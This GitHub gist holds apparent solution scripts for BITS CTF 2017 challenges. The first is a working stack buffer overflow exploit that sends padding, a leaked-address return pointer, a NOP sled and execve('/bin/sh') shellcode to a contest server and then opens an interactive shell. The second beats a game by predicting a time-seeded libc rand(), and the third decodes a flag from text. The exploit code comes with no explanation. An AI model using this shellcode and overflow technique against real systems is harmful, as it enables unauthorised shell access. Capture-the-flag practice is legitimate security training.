Skip to content

Instantly share code, notes, and snippets.

@ytn86
Last active February 6, 2017 13:04
Show Gist options
  • Save ytn86/2b29cfaedaeab2248753afcd6db880ff to your computer and use it in GitHub Desktop.
Save ytn86/2b29cfaedaeab2248753afcd6db880ff to your computer and use it in GitHub Desktop.
BITS CTF 2017
#! /usr/bin/env python3
import sys
import struct
from telnetlib import Telnet
def p64(addr):
return struct.pack('<Q', addr)
def exploit(tn):
stack = int(tn.read_some()[0:14],16)
payload = b'AAAAAAAAAAAAAAAAAAAAAAAA'
sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
payload += p64(stack+128)
payload += b'\x90'*256
payload += sc
tn.write(payload)
tn.interact()
def main(argc, argv):
if argc != 2:
print('python {} l|r'.format(argv[0]))
sys.exit(1)
if argv[1] == 'r':
tn = Telnet('bitsctf.bits-quark.org', 1330)
exploit(tn)
else:
tn = Telnet('localhost', 1330)
exploit(tn)
if __name__ == '__main__':
main(len(sys.argv), sys.argv)
from ctypes import *
from telnetlib import Telnet
def exploit(tn):
libc = CDLL("libc.so.6")
time = libc.time()
libc.srand(time)
for i in range(0, 30):
tn.read_until(b'round : ')
val = libc.rand() & 15
tn.write(str(val).encode() + b'\n')
tn.interact()
def main():
tn = Telnet('bitsctf.bits-quark.org', 1335)
exploit(tn)
if __name__ == '__main__':
main()
#! /usr/bin/env python3
import binascii
import sys
def main():
with open('final.txt', 'r') as f:
data = f.read()
table = {}
string = ''
for i in range(0, len(data)):
if data[i].isupper():
if data[i] in table.keys():
table[data[i]] += 1
else:
table[data[i]] = 1
string += data[i]
string = string.replace('ZERO', '0')
string = string.replace('ONE', '1')
data = int(string, 2)
flag = binascii.unhexlify('%x' % data).decode()
print(flag)
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment